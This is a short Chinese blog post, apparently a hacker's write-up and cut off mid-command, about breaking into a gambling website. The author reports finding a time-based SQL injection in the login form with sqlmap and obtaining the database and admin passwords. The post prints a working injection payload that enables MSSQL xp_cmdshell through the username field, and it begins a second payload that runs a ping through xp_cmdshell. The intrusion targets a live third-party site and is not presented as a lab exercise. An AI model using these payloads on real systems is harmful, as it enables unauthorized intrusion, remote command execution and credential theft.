前言:
前几天无意看到了某个师傅的博客,就看到了某棋牌站点的sql注入,于是花了几分钟打了一下,也就当第一次打这种站点,过程非常简单,最后也是获取到了数据库密码,网站后台密码。
sql注入:
该站点如果有师傅打过,肯定有感觉的。
登录框这里存在sql注入,sqlmap跑一下。
但是这里只是一个延时注入,是dba权限
这里就不执行os-shell了,太慢了,直接利用xp_cmdshell执行命令
xp_cmdshell上线:
开启xp_cmdshell:
admin';EXEC sp_configure 'show advanced options',1;RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;--
执行命令判断出网:
admin';exec master..xp_cmdshell 'ping dn